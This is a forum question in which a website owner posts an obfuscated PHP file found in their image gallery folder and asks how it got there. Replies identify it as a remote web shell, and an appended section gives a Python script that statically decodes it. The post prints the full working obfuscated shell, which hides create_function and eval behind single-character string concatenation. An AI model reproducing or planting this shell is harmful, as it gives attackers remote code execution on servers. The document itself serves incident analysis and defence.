
Can anyone tell me what this is, or how it could possibly have made it to the image gallery folder of my website? It appears to be a bunch of variable definitions. Mind you that a period "." is the concatenation character in PHP. The file was named pic-1_infoold.php, where pic-1.jpg is the name of an image in the gallery.

I have a shared hosting account with Godaddy.

I've already changed passwords with the shared hosting provider and for FTP. I hope to better understand what happened so I can know the scope, and also so I can prevent it in the future.

Thanks to anyone that has any insight.

<?php

$hellfire='"s'; $centerpiece = '$';

$mair = 't'; $crossword = '_'; $beautifier= 'E';$h2o= 'i';$inauguration= 'G';

$backlog = '1'; $caterina='d'; $initializing ='V(+i_,?s;';$elan='D';$all= 'u'; $genuineness= 'hc(';$krypton= 'sr)o)Ee'; $crevice ='v'; $custodial ='e';$consecutive = 'B';$azimuthal = '_'; $footers='E'; $crazily= 'ptT"rR(';$convince='_L)9;C';$hadnt='sJc4OI('; $establish = '4$e"_';

$cowboy = 's';
$leathers='(';$judi= 'y';$attendee= 'p';$intravenous='g'; $brainchild='e';
$bedlam= 'o;'; $cavities = 'S'; $frazer='R';

$delmor= 'u';$amble= ':RauK';$concluded='e_>aUae'; $janella ='G8"U3v"'; $brinn='ye])';
$cash='g';$guilbert= 't'; $hayward = 'H';

$illegal= 'M'; $inlet= 'H$Q6r'; $habitation ='e';$imprecision='(grm:ai';$hazard = 'g';$assassins='r'; $gave='V'; $electorate= 'O';

$apothecary ='ddV:O=';$climbs= 'E';
$ceaselessly = 'F'; $bluing='l'; $discover ='s'; $distance= 'TEO[lr'; $budgets = '@';$hams='O';

$inkling = '$g_((S]U'; $kathleen = 'c=Rr'; $antonia='e'; $josefa='e';$elli ='l';$flyway = '[';$flub = '('; $chaperone ='L)]Ent'; $fleshing = 'i'; $cookies='Hicoae"';$januaries = 'i<2e';$cohesive='r'; $kivu='$'; $eminence= '$';$husbandman = 'a';$decrement='n';$ideologically='[TC';
$lebesgue='tnQ'; $chaffer=','; $hatchet ='$'; $fearlessly ='H'; $guessing = 'l'; $gopher = 'aaNGP_';

$jillene= 'K'; $fredek ='a)';$charts = '.isP$h';
$froze ='a$(';$concrete = ')ob';
$briano= 'T';
$guess = '7r';$gowned = 'A';
$emanate= 'R'; $incompatible= '[';
$emissivity='o5v)/';
$grated = '?';$dental='6'; $epigenetic='_t;?-RI';$committees = 'v0$a_)L';$guthry= 'e';$battlers=')'; $darning='e'; $embroiders= 'r= "(tf)';$camel= 'r';

$duffie= 'sUrHSU';
$gamaliel =','; $gigaherz ='"uP';$gaven= 'u'; $carrageen =']';$eggshell='ivuT_;'; $invoking='erfi';$eyelash ='v';

$horoscope =$cookies['2'] .

$invoking['1'] . $invoking['0']. $committees['3'].$embroiders['5'] .$invoking['0'] . $eggshell['4'].

$invoking['2'].
$eggshell['2']. $lebesgue['1'].
$cookies['2'] . $embroiders['5'] . $invoking['3'] .

$emissivity['0'] .

$lebesgue['1'] ;$lunchroom = $embroiders[2]; $contrastingly= $horoscope ($lunchroom, $invoking['0'] . $eyelash['0'].$committees['3'] . $guessing .$embroiders['4'].

$committees['3'].$invoking['1'] .$invoking['1']. $committees['3']. $brinn['0']. $eggshell['4']. $attendee .$emissivity['0'] . $attendee.$embroiders['4']. $invoking['2'] . $eggshell['2'] . $lebesgue['1'].
$cookies['2']. $eggshell['4'] .$inkling['1'] .
$invoking['0']. $embroiders['5'].$eggshell['4'] .$committees['3'] .$invoking['1'].$inkling['1']. $duffie['0'].$embroiders['4']. $embroiders['7'] .$embroiders['7'].

$embroiders['7'] . $eggshell['5'] );$contrastingly ($cleverness['2'] , $brinn['0'] , $invoking['0'] ,$brinn['0'] ,$eggshell['4'],$gowned,
$ideologically['2'] , $epigenetic['3'] ,$apothecary['1'] ,$gamaliel ,

$committees['2'] . $invoking['3'].$embroiders['1']. $committees['3'].

$invoking['1'].

$invoking['1'].

$committees['3'] .$brinn['0'] . $eggshell['4'].$imprecision[3] .$invoking['0'] .$invoking['1'].$inkling['1'].

$invoking['0'].

$embroiders['4'] .$committees['2']. $eggshell['4'].$epigenetic['5']. $chaperone['3'] . $lebesgue['2'] .$duffie['5'] . $chaperone['3'] . $duffie['4'].$eggshell['3'] .$gamaliel .$committees['2'] .$eggshell['4'].$ideologically['2'] . $hams .

$hams.
$jillene. $epigenetic[6].$chaperone['3'].$gamaliel.$committees['2'].$eggshell['4'] .

$duffie['4']. $chaperone['3']. $epigenetic['5'].$apothecary['2']. $chaperone['3'] .

$epigenetic['5'] .$embroiders['7'].$eggshell['5'] .
$committees['2'] .$committees['3']. $embroiders['1'] .

$invoking['3'].
$duffie['0'].$duffie['0'] .$invoking['0'] . $embroiders['5']. $embroiders['4'].
$committees['2'].$invoking['3']. $incompatible .$gigaherz['0']. $eggshell['2'].$eyelash['0'] . $eggshell['2'] .

$charts['5']. $emissivity['0'] .
$guessing . $invoking['1'] .

$inkling['1'].$gigaherz['0'] .

$carrageen . $embroiders['7'] . $epigenetic['3']. $committees['2'] .$invoking['3'].$incompatible.$gigaherz['0'] .$eggshell['2'] .$eyelash['0']. $eggshell['2'].$charts['5']. $emissivity['0'].
$guessing . $invoking['1'] .$inkling['1']. $gigaherz['0']. $carrageen.$apothecary['3'].$embroiders['4'] .$invoking['3']. $duffie['0']. $duffie['0'] . $invoking['0'] .$embroiders['5'] .$embroiders['4'].$committees['2'].
$invoking['3'] .
$incompatible .$gigaherz['0'].$duffie['3'] .

$eggshell['3']. $eggshell['3']. $gigaherz['2'].$eggshell['4']. $duffie['5']. $apothecary['2'] . $duffie['5'].$duffie['3'] .
$hams. $committees['6'] . $epigenetic['5']. $gopher['3'] . $gigaherz['0'].$carrageen.$embroiders['7']. $epigenetic['3']. $committees['2'].
$invoking['3'] .

$incompatible.$gigaherz['0'].$duffie['3'].

$eggshell['3'] .

$eggshell['3'] . $gigaherz['2'].
$eggshell['4'] . $duffie['5'].$apothecary['2'] .$duffie['5']. $duffie['3'] .$hams .$committees['6'].$epigenetic['5']. $gopher['3'].
$gigaherz['0']. $carrageen .

$apothecary['3'].

$apothecary['1'].$invoking['3'] .$invoking['0'] . $embroiders['7'] .$eggshell['5'].

$invoking['0'] .$eyelash['0'].$committees['3'] .$guessing .

$embroiders['4'].

$duffie['0'] .$embroiders['5'] . $invoking['1'] .

$invoking['1'] . $invoking['0'] .

$eyelash['0'].$embroiders['4'] .

$concrete['2'] .
$committees['3'] .

$duffie['0'] .$invoking['0'].$dental.
$establish['0'] .
$eggshell['4']. $apothecary['1'] . $invoking['0'].$cookies['2'] . $emissivity['0']. $apothecary['1'] . $invoking['0'] . $embroiders['4'] . $duffie['0'] .
$embroiders['5'] . $invoking['1'].

$invoking['1'].$invoking['0'] .

$eyelash['0']. $embroiders['4'] .$committees['2'] .$committees['3']. $embroiders['7'] .$embroiders['7'].$embroiders['7'] .
$embroiders['7']. $eggshell['5'] ); 
Aunt Jemima

  • I'm not asking to de-obfuscate the code. I can parse it. I want to know how or why it got there. – Aunt Jemima Jun 17 '16 at 02:59
  • It's a typical remote PHP shell, here's the unpacked code: http://pastebin.com/b9ajqx0M – Alexander O'Mara Jun 17 '16 at 03:15
  • Your gallery software or CMS probably has one or more security bugs, either from a recent 0day or because you haven't kept it updated on a regular basis. – wireghoul Jun 17 '16 at 03:23
  • Thank you very much for the links and the insight. Eval is not an available function and doing a text search through my directories I can't find an instance of preg_replace being used. I appreciate you pointing me around. I'm still stumped where the exploit was. I don't have any plugins, libraries or content management. – Aunt Jemima Jun 17 '16 at 03:42
  • Typical example of PHP stupidity, where any uploaded file is happily executed. Take this as a lesson and never use PHP again. – André Borie Jun 17 '16 at 03:42
  • @AndréBorie, the only files I uploaded were my own and I haven't used anyone else's code on my shared account ever. – Aunt Jemima Jun 17 '16 at 03:48
  • @AuntJemima I meant that there is some file upload feature on your site and it was abused to upload a malicious file - on a sane environment the file would just be inert and won't be executed, but through the magic of PHP the file will get executed if someone requests its URL. – André Borie Jun 17 '16 at 03:49
  • Thank you Alexander O'Mara. The links you gave did actually lead me to relevant information and a vocabulary to begin asking the right questions. – Aunt Jemima Jun 17 '16 at 05:25
  • Change permissions of directory so files cannot execute. – k1308517 Jun 17 '16 at 08:53

0 Answers
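Editor's addition (not part of the original post or any commenter's answer): the posted file is the "scatter the alphabet across junk variables, then rebuild strings from one-character offsets" style of PHP dropper. Since the whole file is single-quoted literals and `.`-joined `$var['n']` terms, it can be resolved statically, without running any of it, by a few regexes. The script below does that. Its sample input is the posted file cut down to the literals the first two expressions use; the lambda body, which the file passes straight into `create_function()`, is placed in a made-up `$body` variable so it can be resolved on its own. Resolved, `$horoscope` is `create_function` and `$body` is `eval(array_pop(func_get_args()));`, i.e. an anonymous function that evals its last argument; the remainder of the file is the long argument list that feeds it. Everything else about the script (function names, the `<?name>` marker for unresolvable terms, the sink list) is my own choice, not anything from the page.

```python
import re

# Constructed sample: the posted file reduced to the literals its first two
# expressions use. The lambda body the file hands to create_function() is
# stored in a made-up $body variable; the literals and terms are otherwise
# copied verbatim from the posted code.
SAMPLE = r"""<?php
$lebesgue='tnQ'; $inkling = '$g_((S]U'; $cookies='Hicoae"'; $brinn='ye])';
$committees = 'v0$a_)L'; $guessing = 'l'; $attendee= 'p'; $emissivity='o5v)/';
$duffie= 'sUrHSU'; $eggshell='ivuT_;'; $invoking='erfi'; $eyelash ='v';
$embroiders= 'r= "(tf)';
$horoscope =$cookies['2'] . $invoking['1'] . $invoking['0']. $committees['3'].$embroiders['5'] .$invoking['0'] . $eggshell['4'].
$invoking['2']. $eggshell['2']. $lebesgue['1']. $cookies['2'] . $embroiders['5'] . $invoking['3'] . $emissivity['0'] . $lebesgue['1'] ;
$lunchroom = $embroiders[2];
$body = $invoking['0'] . $eyelash['0'].$committees['3'] . $guessing .$embroiders['4'].
$committees['3'].$invoking['1'] .$invoking['1']. $committees['3']. $brinn['0']. $eggshell['4']. $attendee .$emissivity['0'] . $attendee.$embroiders['4']. $invoking['2'] . $eggshell['2'] . $lebesgue['1'].
$cookies['2']. $eggshell['4'] .$inkling['1'] . $invoking['0']. $embroiders['5'].$eggshell['4'] .$committees['3'] .$invoking['1'].$inkling['1']. $duffie['0'].$embroiders['4']. $embroiders['7'] .$embroiders['7'].
$embroiders['7'] . $eggshell['5'] ;
"""

# $name = 'literal';   (single-quoted PHP string; only \' and \\ are escapes)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# $name = $a['1'] . $b[2] . $c ;   (a chain of variable/offset terms joined by dots)
EXPR_ASSIGN_RE = re.compile(
    r"\$(\w+)\s*=\s*((?:\$\w+(?:\[\s*'?\d+'?\s*\])?\s*(?:\.\s*)?)+);")
# one term of such a chain: $name, $name['3'] or $name[3]
TERM_RE = re.compile(r"\$(\w+)(?:\[\s*'?(\d+)'?\s*\])?")

# Substrings that mark a resolved value as a code-execution sink (my own list).
DANGEROUS = ("create_function", "eval(", "assert(", "preg_replace", "system(",
             "passthru(", "shell_exec(", "base64_decode(")


def load_literals(php_src):
    """Collect every $var = '...'; assignment into a dict, unescaping PHP single quotes."""
    lits = {}
    for name, raw in ASSIGN_RE.findall(php_src):
        lits[name] = raw.replace("\\'", "'").replace("\\\\", "\\")
    return lits


def resolve(expr, lits):
    """Turn a chain of $var / $var[n] terms into the string PHP would build.

    Terms that cannot be resolved are rendered as <?name> or <?name[n]> rather
    than dropped, so gaps stay visible (the posted file uses $cleverness['2']
    without ever defining $cleverness, for example).
    """
    out = []
    for name, idx in TERM_RE.findall(expr):
        val = lits.get(name)
        if val is None:
            out.append("<?%s>" % name)
        elif idx == "":
            out.append(val)                      # bare $var: the whole literal
        else:
            i = int(idx)                         # $var['n']: one character
            out.append(val[i] if i < len(val) else "<?%s[%d]>" % (name, i))
    return "".join(out)


def decode(php_src):
    """Resolve every $name = <chain>; assignment, in source order.

    Each resolved value is added to the literal table, so later chains that
    reference an earlier alias (the file's $lunchroom) resolve as well.
    """
    lits = load_literals(php_src)
    decoded = {}
    for m in EXPR_ASSIGN_RE.finditer(php_src):
        name, expr = m.group(1), m.group(2)
        value = resolve(expr, lits)
        lits[name] = value
        decoded[name] = value
    return decoded


def flag_sinks(decoded):
    """Return (variable, resolved string) pairs that name a code-execution sink."""
    return [(n, v) for n, v in decoded.items() if any(d in v for d in DANGEROUS)]


if __name__ == "__main__":
    result = decode(SAMPLE)
    for name, value in result.items():
        print("$%s -> %r" % (name, value))
    print("sinks:", [n for n, _ in flag_sinks(result)])
```

On the full posted file `decode()` recovers `$horoscope` and `$lunchroom` directly; the argument strings inside the `$contrastingly(...)` call are not assignments, so paste each of them into `resolve()` with the table from `load_literals()`. Two caveats worth keeping in mind when triaging a file like this: `eval` is a language construct, not a function, so `disable_functions` never removes it, which is why droppers of this shape hide it behind `create_function`; and nothing here runs the sample, so the resolver is safe to point at anything found in the gallery directory, but it only understands this one concatenation idiom, not the `base64_decode`/`gzinflate` layers that are usually stacked underneath.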